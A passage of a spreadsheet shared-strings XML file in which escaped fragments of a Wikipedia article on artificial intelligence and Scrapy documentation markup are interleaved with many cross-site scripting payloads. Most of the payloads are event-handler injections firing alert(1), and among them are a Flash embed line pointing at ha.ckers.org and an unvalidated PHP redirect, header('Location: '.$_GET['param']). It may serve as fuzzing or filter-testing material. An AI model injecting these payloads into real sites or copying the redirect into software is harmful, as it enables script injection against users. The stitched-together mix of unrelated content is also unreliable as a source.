abilities"&gt;cognitive abilities &lt;/a&gt; rival those of humanity, their impulse to push for legal and political &lt;a href="/wiki/Rights" title="Rights"&gt;rights &lt;/a&gt; will become irresistible – the right not to be deleted, not to have their memories wiped clean, not to suffer &lt;a href="/wiki/Pain" title="Pain"&gt;pain &lt;/a&gt; and degradation. The alternative, embodied by IIT [Integrated Information Theory], is that computers will remain only supersophisticated machinery, ghostlike empty shells, devoid of what we value most: the feeling of life itself." (p.&amp;#160;49.) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onclick="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;meter oncut="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;body style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.bbc.com/news/technology-35785875"&gt;"Artificial intelligence: Google's AlphaGo beats Go master Lee Se-dol" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. 12 March 2016. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160826103910/http://www.bbc.com/news/technology-35785875"&gt;Archived &lt;/a&gt; from the original on 26 August 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;1 October </t>
  </si>
  <si>
    <t>&lt;strike onpointerover=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;picture id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;main onmousedown="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;command oncontextmenu="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;title style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;link onkeydown="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;430–435 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;command onpointerover=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Samuel, A. L. (July 1959). "Some Studies in Machine Learning Using the Game of Checkers". &lt;i&gt;IBM Journal of Research and Development &lt;/i&gt;. &lt;b&gt;3 &lt;/b&gt; (3): 210–229. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.368.2254"&gt;10.1.1.368.2254 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;input id=x tabindex=1 onactivate=alert(1)&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpaste="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;samp onmousemove="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;script onmousemove="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;td onmouseenter="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;ins style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;form draggable="true" ondragend="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Wired+UK&amp;amp;rft.atitle=The+UK+is+about+to+Start+Testing+Self-Driving+Truck+Platoons&amp;amp;rft.date=2017-08-24&amp;amp;rft.aulast=Burgess&amp;amp;rft.aufirst=Matt&amp;amp;rft_id=https%3A%2F%2Fwww.wired.co.uk%2Farticle%2Fuk-trial-self-driving-trucks-platoons-roads&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Subfields_of_and_cyberneticians_involved_in_cybernetics" style="padding:3px"&gt;&lt;table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onmouseenter="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;listing onkeydown="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;ol onload=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;base onmouseover="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;plaintext style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/deploy.html"&gt;&lt;span class="doc"&gt;Deploying Spiders</t>
  </si>
  <si>
    <t>&lt;keygen onmouseleave="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;The brain can be simulated by machines and because brains are intelligent, simulated brains must also be intelligent; thus machines can be intelligent. &lt;a href="/wiki/Hans_Moravec" title="Hans Moravec"&gt;Hans Moravec &lt;/a&gt;, &lt;a href="/wiki/Ray_Kurzweil" title="Ray Kurzweil"&gt;Ray Kurzweil &lt;/a&gt; and others have argued that it is technologically feasible to copy the brain directly into hardware and software and that such a simulation will be essentially identical to the original.&lt;sup id="cite_ref-Brain_simulation_153-1" class="reference"&gt;&lt;a href="#cite_note-Brain_simulation-153"&gt;&amp;#91;150&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;hr id=x tabindex=1 onactivate=alert(1)&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;embed id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointerdown=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Software_development" title="Software development"&gt;Software development &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onbeforepaste="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;command onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/command&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset oncopy="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onpointerup=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-378"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-378"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;Try the &lt;a class="reference internal" href="faq.html"&gt;&lt;span class="doc"&gt;FAQ</t>
  </si>
  <si>
    <t>&lt;form ondblclick="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;45–50 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Perception </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Decision_tree-217"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Decision_tree_217-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;image srcset=1 onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;address id=x tabindex=1 onactivate=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointerup=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Smoliar, Stephen W.; Zhang, HongJiang (1994). "Content based video indexing and retrieval". &lt;i&gt;IEEE Multimedia &lt;/i&gt;. &lt;b&gt;1 &lt;/b&gt; (2): 62–72. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1109%2F93.311653"&gt;10.1109/93.311653 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=IEEE+Multimedia&amp;amp;rft.atitle=Content+based+video+indexing+and+retrieval&amp;amp;rft.volume=1&amp;amp;rft.issue=2&amp;amp;rft.pages=62-72&amp;amp;rft.date=1994&amp;amp;rft_id=info%3Adoi%2F10.1109%2F93.311653&amp;amp;rft.aulast=Smoliar&amp;amp;rft.aufirst=Stephen+W.&amp;amp;rft.au=Zhang%2C+HongJiang&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;header id=x tabindex=1 onfocus=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_geometry" title="Computational geometry"&gt;Computational geometry &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;track onmouseleave="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Rudolf_Steiner" title="Rudolf Steiner"&gt;Rudolf Steiner &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>SRC="http://ha.ckers.org/.swf" AllowScriptAccess="always"</t>
  </si>
  <si>
    <t>&lt;content onmouseleave="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmouseover="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointerup=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption oncut="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;span draggable="true" ondragend="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">                latest</t>
  </si>
  <si>
    <t>&lt;applet oncut="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a href="/wiki/File:Kismet_robot_at_MIT_Museum.jpg" class="image"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft_id=https%3A%2F%2Fars.electronica.art%2Foutofthebox%2Fen%2Fdigital-humanism-conf%2F+Retrieved+September+2019&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;q id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>d="alert('');\")";</t>
  </si>
  <si>
    <t>&lt;li onmouseup="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;</t>
  </si>
  <si>
    <t>&lt;button onmousedown="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-393"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-393"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;var onbeforecopy="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;article id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/article&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Applied&lt;br /&gt;computing &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;form action="/w/index.php" id="searchform"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;link rel="search" title="Search" href="search.html" /&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Gaussian_adaptation" title="Gaussian adaptation"&gt;Gaussian adaptation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;frameset id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;param id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/param&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;th id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;data onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/data&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;mark draggable="true" ondragleave="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;em onbeforepaste="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;menu onkeyup="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=42" title="Edit section: Video games"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/extensions.html"&gt;Extensions&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;wbr oncut="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style id=x tabindex=1 onactivate=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;u id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;section onmouseover="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Propositional_attitude" title="Propositional attitude"&gt;Propositional attitude &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title onmouseout="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;863–898 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot id=x tabindex=1 onfocus=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;details onblur=alert(1) tabindex=1 id=x&gt;&lt;/details&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onmousemove="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;input onpointermove=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>header('Location: '.$_GET['param']);</t>
  </si>
  <si>
    <t>&lt;slot oncontextmenu="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-150"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-150"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2015 </t>
  </si>
  <si>
    <t>&lt;video draggable="true" ondragleave="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;div onpointerleave=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Information_theory" title="Information theory"&gt;Information theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/b/b8/Kismet_robot_at_MIT_Museum.jpg/220px-Kismet_robot_at_MIT_Museum.jpg" decoding="async" width="220" height="165" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/b/b8/Kismet_robot_at_MIT_Museum.jpg/330px-Kismet_robot_at_MIT_Museum.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/b/b8/Kismet_robot_at_MIT_Museum.jpg/440px-Kismet_robot_at_MIT_Museum.jpg 2x" data-file-width="2272" data-file-height="1704" /&gt; &lt;/a&gt;  </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;spacer onload=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Electronic_design_automation" title="Electronic design automation"&gt;Electronic design automation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nav oncopy="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;img alt="Category" src="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/16px-Folder_Hexagonal_Icon.svg.png" decoding="async" title="Category" width="16" height="14" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/24px-Folder_Hexagonal_Icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/32px-Folder_Hexagonal_Icon.svg.png 2x" data-file-width="36" data-file-height="31" /&gt; &lt;b&gt;&lt;a href="/wiki/Category:Emerging_technologies" title="Category:Emerging technologies"&gt;Category &lt;/a&gt; &lt;/b&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Test your extraction code in an interactive environment.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;applet onreadystatechange=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span id="Machine_consciousness.2C_sentience_and_mind"&gt; </t>
  </si>
  <si>
    <t>&lt;strike onbeforecut="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;address id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Multimedia_database" title="Multimedia database"&gt;Multimedia information system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;body onpointerover=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;track id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseleave="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-guardian_jobs_debate-24"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-guardian_jobs_debate_24-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-guardian_jobs_debate_24-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Motion and manipulation </t>
  </si>
  <si>
    <t>&lt;li onmousedown="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menu id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/menu&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;element onpointerenter=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;footer id=x tabindex=1 onactivate=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2018 </t>
  </si>
  <si>
    <t>&lt;thead draggable="true" ondragend="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Gillick, Dan; Brunk, Cliff; Vinyals, Oriol; Subramanya, Amarnag (2015). "Multilingual Language Processing From Bytes". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1512.00103"&gt;1512.00103 &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Sun, R. &amp;amp; Bookman, L. (eds.), &lt;i&gt;Computational Architectures: Integrating Neural and Symbolic Processes &lt;/i&gt;. Kluwer Academic Publishers, Needham, MA. 1994. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;source draggable="true" ondragend="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;section id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Valentin_Turchin" title="Valentin Turchin"&gt;Valentin Turchin &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;shadow style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onkeyup="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>&lt;acronym onpaste="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;canvas id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;details onkeydown="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;slot id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/slot&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;abbr id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/abbr&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;output ondragover=alert(1) contenteditable&gt;drop here&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;font oncontextmenu="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;i id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/i&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;table draggable="true" ondragenter="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;big onmouseenter="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;link onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/link&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;command onpointerleave=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;thead onkeydown="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;form id="rtd-search-form" class="wy-form" action="search.html" method="get"&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onpointermove=alert(1)&gt;XSS&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;strong onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/strong&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-3"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-3"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;details id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;dd draggable="true" ondragstart="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;select ondragover=alert(1) contenteditable&gt;drop here&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;strike onmouseenter="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;title onpointerenter=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpointerup=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;blockquote onload=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;menu ondblclick="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. &lt;a href="/wiki/Google_AdSense" title="Google AdSense"&gt;AdSense &lt;/a&gt; uses a Bayesian network with over 300 million edges to learn which ads to serve.&lt;sup id="cite_ref-FOOTNOTEDomingos2015chapter_6_212-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015chapter_6-212"&gt;&amp;#91;206&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Philosophical_analysis" title="Philosophical analysis"&gt;Analysis &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;area id=x tabindex=1 onactivate=alert(1)&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;hr onpointerout=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
